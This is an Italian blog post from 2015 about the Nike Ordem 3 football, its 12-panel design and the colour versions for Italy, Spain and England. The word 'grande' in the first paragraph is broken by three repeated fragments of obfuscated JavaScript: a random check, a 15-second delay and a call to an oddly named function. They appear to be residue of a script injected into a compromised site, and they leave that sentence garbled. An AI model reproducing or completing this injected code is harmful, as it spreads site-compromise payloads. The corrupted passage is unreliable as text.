The Locker Room

ORDEM 3

30 giugno 2015 Speak About, Stile
ORDEM 3

Disegnato e prodotto dalla Nike, sarà comune agli stadi della Serie A, della LIGA BBVA e della Premier League. Il nome scelto per il nuovo pallone da gioco del grandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ande calcio europeo è “Ordem 3” e il suo design è studiato appositamente per renderlo perfettamente visibile in qualsiasi tipo di condizione atmosferica e situazione di gioco.

Costituito da 12 pannelli che lo dividono graficamente in spicchi, in Italia è proposto nella versione di color bianco e nero con sfumature rosa mentre in Spagna e Inghilterra verranno utilizzati rispettivamente i modelli con sfumature giallo fosforescente e rosso.

Uno stile ben lontano dai pentagoni bianco e nero o dall’ormai storico color cuoio, l’“Ordem 3” ha già attirato qualche critica… non ci resta che attendere le ben più importanti considerazioni di ordine tecnico e balistico dei calciatori che dal 23 Agosto 2015, torneranno a far sognare milioni di tifosi in tutta Italia.